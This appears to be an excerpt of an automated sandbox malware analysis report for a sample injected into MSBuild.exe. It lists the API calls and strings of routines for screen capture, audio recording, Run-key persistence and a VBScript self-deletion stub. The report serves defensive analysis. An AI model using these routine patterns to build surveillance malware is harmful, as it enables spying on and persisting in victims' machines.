                                                                                                                                            • Instruction Fuzzy Hash: EB91C8722080A319DB2D463E847403FFFE19A563A1B1BA79FD4F2CB2C5EE18D564D624
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                            • Instruction ID: 4bc7a19b78b3923bd294324807b23a5e70e392b11aa895e474023c0768c286cc
                                                                                                                                            • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                            • Instruction Fuzzy Hash: 1C91B6762080A35ADB2D463AC43403FFFE15A563A1B1B979FD4F2CB2C5EE18C568D624
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                            • Instruction ID: 8cd81e8b6c8cb135a2d00aee0b4681899237c427d703fcd1ed6b13232f465ad6
                                                                                                                                            • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                            • Instruction Fuzzy Hash: 439195722090A35ADB2D463D843403FFFE15E5A3A1B1B979FD4F2CB2C5EE28C5649624
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                            • Instruction ID: b40c52ae0115b4061fe2d1036eda9829452ee7622c5651f608d151b30f65a328
                                                                                                                                            • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                            • Instruction Fuzzy Hash: B081C4722090A319DB2D463E843403FFFE15A563A5B1BA7AFD4F2CB2C5EE18C5649624
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                                                                                                            • Instruction ID: 61f6cd4e2a94a36a6652522188f48ed2bcd63c305fdb574287b7df62abf21a4e
                                                                                                                                            • Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                                                                                                            • Instruction Fuzzy Hash: BB51677170460D9BDB34E96894E77BFA3899B0E344F18350BD882B7382D60CED02939E
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6f0963373f33ef73dbd289fc78ad1b7818d684b7f305e862658b304cf2148f24
• Instruction ID: 42e819d74c2f676ea4fb49a2469d6a41ac5eaf2d1859dcf64078451750f97267
• Opcode Fuzzy Hash: 6f0963373f33ef73dbd289fc78ad1b7818d684b7f305e862658b304cf2148f24
• Instruction Fuzzy Hash: 49614E32A083119FC308DF35E581A5BB7E5FFDC718F550E1EF48996151E674EA088B8A
APIs
• CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FB9
• CreateCompatibleDC.GDI32(00000000), ref: 00417FC4
  • Part of subcall function 00418452: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418482
• CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418045
• DeleteDC.GDI32(?), ref: 0041805D
• DeleteDC.GDI32(00000000), ref: 00418060
• SelectObject.GDI32(00000000,00000000), ref: 0041806B
• StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 00418093
• GetCursorInfo.USER32(?), ref: 004180B5
• GetIconInfo.USER32(?,?), ref: 004180CB
• DeleteObject.GDI32(?), ref: 004180FA
• DeleteObject.GDI32(?), ref: 00418107
• DrawIcon.USER32(00000000,?,?,?), ref: 00418114
• BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418144
                                                                                                                                            • GetObjectA.GDI32(?,00000018,?), ref: 00418173
                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000028), ref: 004181BC
                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001), ref: 004181DF
                                                                                                                                            • GlobalAlloc.KERNEL32(00000000,?), ref: 00418248
                                                                                                                                            • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041826B
                                                                                                                                            • DeleteDC.GDI32(?), ref: 0041827F
                                                                                                                                            • DeleteDC.GDI32(00000000), ref: 00418282
                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00418285
                                                                                                                                            • GlobalFree.KERNEL32(00CC0020), ref: 00418290
                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00418344
                                                                                                                                            • GlobalFree.KERNEL32(?), ref: 0041834B
                                                                                                                                            • DeleteDC.GDI32(?), ref: 0041835B
                                                                                                                                            • DeleteDC.GDI32(00000000), ref: 00418366
                                                                                                                                            • DeleteDC.GDI32(?), ref: 00418398
                                                                                                                                            • DeleteDC.GDI32(00000000), ref: 0041839B
                                                                                                                                            • DeleteObject.GDI32(?), ref: 004183A1
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconInfoLocal$BitmapBitsCursorDisplayDrawEnumSelectSettingsStretch
                                                                                                                                            • String ID: DISPLAY
                                                                                                                                            • API String ID: 1352755160-865373369
                                                                                                                                            • Opcode ID: 22c96b6163cb50d8b2a0e7298f69cab473e7aa59f92580ce48d75f9de49cebd4
                                                                                                                                            • Instruction ID: f05cd178694609e891ba83f5bdf02bb76ea447df34f4969275af8919d08089d1
                                                                                                                                            • Opcode Fuzzy Hash: 22c96b6163cb50d8b2a0e7298f69cab473e7aa59f92580ce48d75f9de49cebd4
                                                                                                                                            • Instruction Fuzzy Hash: 12C17C31508345AFD3209F25DC44BABBBE9FF88751F04082EF989932A1DB34E945CB5A
                                                                                                                                            APIs
                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
                                                                                                                                            • ExitProcess.KERNEL32 ref: 0041151D
                                                                                                                                              • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                                                              • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                                                              • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                                                              • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
                                                                                                                                            • OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
                                                                                                                                              • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                                              • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                                              • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                                            • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
                                                                                                                                            • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
                                                                                                                                            • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
                                                                                                                                            • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
                                                                                                                                              • Part of subcall function 0041B58F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0040A009,?,00000000,00000000), ref: 0041B5EB
                                                                                                                                              • Part of subcall function 0041B58F: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A009,?,00000000,00000000), ref: 0041B5FF
                                                                                                                                              • Part of subcall function 0041B58F: CloseHandle.KERNEL32(00000000,?,0040A009,?,00000000,00000000), ref: 0041B60C
                                                                                                                                            • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
                                                                                                                                            • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
                                                                                                                                            • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
                                                                                                                                              • Part of subcall function 0041B58F: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6A5,00000000,00000000,?), ref: 0041B5CE
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                                                                                                                                            • String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
                                                                                                                                            • API String ID: 4250697656-2665858469
                                                                                                                                            • Opcode ID: c80fabc7b58b6664533cdc435cbe53a9781b5ca893f5b0e43887563f66929a29
                                                                                                                                            • Instruction ID: b1cd6038c3dd2fca16f1d1fb39a824579eeb1b45f376adef666059b0b2e54ae4
                                                                                                                                            • Opcode Fuzzy Hash: c80fabc7b58b6664533cdc435cbe53a9781b5ca893f5b0e43887563f66929a29
                                                                                                                                            • Instruction Fuzzy Hash: D751B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                                                              • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040C38B
                                                                                                                                            • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C39E
                                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040C3B7
                                                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040C3E7
                                                                                                                                              • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_000099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                                                              • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                                                              • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                                                              • Part of subcall function 0041B58F: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6A5,00000000,00000000,?), ref: 0041B5CE
                                                                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C632
                                                                                                                                            • ExitProcess.KERNEL32 ref: 0040C63E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                                            • String ID: """, 0$")$@CG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                                                                                            • API String ID: 1861856835-3168347843
                                                                                                                                            • Opcode ID: 30a7f1232d58b3c75cebc1c3b5ae0731fe694418f196ddfec79bbb146588a510
                                                                                                                                            • Instruction ID: c8b5e11b4abf5c95f8ab28b2bb359051ef64700817c412cd349ec45860bdb676
                                                                                                                                            • Opcode Fuzzy Hash: 30a7f1232d58b3c75cebc1c3b5ae0731fe694418f196ddfec79bbb146588a510
                                                                                                                                            • Instruction Fuzzy Hash: EB9175316042005AC314FB25D852ABF7799AF91718F10453FF98A631E2EF7CAD49C69E
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                                                              • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
                                                                                                                                            • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                                                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
                                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
                                                                                                                                              • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_000099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                                                              • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                                                              • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                                                              • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,76E23530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
                                                                                                                                            • ExitProcess.KERNEL32 ref: 0040C287
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                                            • String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                                                                                                            • API String ID: 3797177996-1998216422
                                                                                                                                            • Opcode ID: 54639b7d9ee10e7a81b53f3e46565cc10b582b28373b0b397b468ca4c2ae59ea
                                                                                                                                            • Instruction ID: 1063ce1f4075510d90626cdc8b34ac690c3cf2dc76fa2c9c3337a4c1feab76e8
                                                                                                                                            • Opcode Fuzzy Hash: 54639b7d9ee10e7a81b53f3e46565cc10b582b28373b0b397b468ca4c2ae59ea
                                                                                                                                            • Instruction Fuzzy Hash: B78191316042005BC315FB21D862ABF77A9ABD1308F10453FF586A71E2EF7CAD49869E
APIs
• mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2B2
• mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2C6
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2EE
• PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A2FF
• mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A340
• mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A358
• mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A36D
• SetEvent.KERNEL32 ref: 0041A38A
• WaitForSingleObject.KERNEL32(000001F4), ref: 0041A39B
• CloseHandle.KERNEL32 ref: 0041A3AB
• mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3CD
• mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3D7
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
• String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
• API String ID: 738084811-1408154895
• Opcode ID: 512388ae3893cad5346b6d93e57f113ab9ba600bb7157453820f8d4955eb17cd
• Instruction ID: 9d48d6c6e0579c1e833a8367b0d02802659df9f73890df0c3e8ff2b6504ede8e
• Opcode Fuzzy Hash: 512388ae3893cad5346b6d93e57f113ab9ba600bb7157453820f8d4955eb17cd
• Instruction Fuzzy Hash: 9A51C2712443056AD214BB31DC82EBF3B5CEB91758F10043FF455A21E2EE389D9986AF
APIs
• CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
• WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
• WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
• WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
• WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
• WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
• WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
• WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
• WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
• WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
• WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
• WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
• WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
• WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: File$Write$Create
• String ID: RIFF$WAVE$data$fmt
• API String ID: 1602526932-4212202414
• Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
• Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
• Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
• Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3
APIs
• GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000001,004068B2,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
• GetProcAddress.KERNEL32(00000000), ref: 004064FD
• GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
• GetProcAddress.KERNEL32(00000000), ref: 00406511
• GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
• GetProcAddress.KERNEL32(00000000), ref: 00406525
• GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
• GetProcAddress.KERNEL32(00000000), ref: 00406539
• GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
• GetProcAddress.KERNEL32(00000000), ref: 0040654D
• GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
• GetProcAddress.KERNEL32(00000000), ref: 00406561
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: AddressHandleModuleProc
• String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
• API String ID: 1646373207-89630625
• Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
• Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
• Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
• Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D
APIs
• _wcslen.LIBCMT ref: 0040BC75
• CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
• CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
• _wcslen.LIBCMT ref: 0040BD54
• CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
• CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000000,00000000), ref: 0040BDF2
• SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
• _wcslen.LIBCMT ref: 0040BE34
• SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
• ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
• ExitProcess.KERNEL32 ref: 0040BED0
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
• String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$del$open$BG$BG
• API String ID: 1579085052-1088133900
• Opcode ID: dc10b710cf19d5e546024f9218f411ba7f3a987ff1f587e32df4140d18237521
